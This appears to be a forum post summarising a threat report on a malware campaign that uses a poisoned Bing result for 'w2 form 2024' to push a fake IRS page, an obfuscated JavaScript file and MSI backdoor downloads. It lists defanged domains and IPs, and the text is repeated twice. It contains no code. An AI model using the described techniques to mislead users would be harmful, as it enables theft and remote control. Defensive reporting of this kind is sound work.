08-21-2024, 05:35 PM
Multi-stage Malware attack exploiting the Bing search engine was found!
Recently, a new attack method exploiting Bing search results, which are typically easy to click on, has been identified.
A recent article reveal a new malware attack exploiting the Bing search engine. This multi-stage malware attack involves distributing malicious files, executing installers, connecting to C2 domains, and downloading and inserting backdoors to carry out attacks such as remote control, data theft, and the delivery of additional payloads.
When searching for “w2 form 2024″—a commonly used keyword for U.S. federal tax forms—the first search result on Bing is a domain titled “Online Website 2024 | Home | W2-Form 2024” from appointopia[.]com. However, clicking on this site redirects users to a fake IRS website (hxxps://grupotefex[.]com/forms-pubs/about-form-w-2/). When users click on this site, they are prompted to solve a CAPTCHA, after which a malicious JavaScript file (Form_Ver-.js) hosted on Google Firebase storage is downloaded.
Upon analyzing the downloaded “Form_ver-14-00-21.js” file, it was found that the malicious code was concealed within seemingly harmless comments. This attack structure is advantageous for hiding malicious payloads, increasing file size to complicate analysis, and evading antivirus detection.
Analysis of “Form_ver-14-00-21.js” revealed that the script was designed to download and execute an MSI package from specific URLs. The script downloaded an MSI file named “BST.msi” from IP address 85[.]208[.]108[.]63. Another script downloaded a similar MSI file, “neuro.msi,” from a similar IP address, 85[.]208[.]108[.]30, suggesting that the same malicious code payload was used.
Recently, a new attack method exploiting Bing search results, which are typically easy to click on, has been identified.
A recent article reveal a new malware attack exploiting the Bing search engine. This multi-stage malware attack involves distributing malicious files, executing installers, connecting to C2 domains, and downloading and inserting backdoors to carry out attacks such as remote control, data theft, and the delivery of additional payloads.
When searching for “w2 form 2024″—a commonly used keyword for U.S. federal tax forms—the first search result on Bing is a domain titled “Online Website 2024 | Home | W2-Form 2024” from appointopia[.]com. However, clicking on this site redirects users to a fake IRS website (hxxps://grupotefex[.]com/forms-pubs/about-form-w-2/). When users click on this site, they are prompted to solve a CAPTCHA, after which a malicious JavaScript file (Form_Ver-.js) hosted on Google Firebase storage is downloaded.
Upon analyzing the downloaded “Form_ver-14-00-21.js” file, it was found that the malicious code was concealed within seemingly harmless comments. This attack structure is advantageous for hiding malicious payloads, increasing file size to complicate analysis, and evading antivirus detection.
Analysis of “Form_ver-14-00-21.js” revealed that the script was designed to download and execute an MSI package from specific URLs. The script downloaded an MSI file named “BST.msi” from IP address 85[.]208[.]108[.]63. Another script downloaded a similar MSI file, “neuro.msi,” from a similar IP address, 85[.]208[.]108[.]30, suggesting that the same malicious code payload was used.
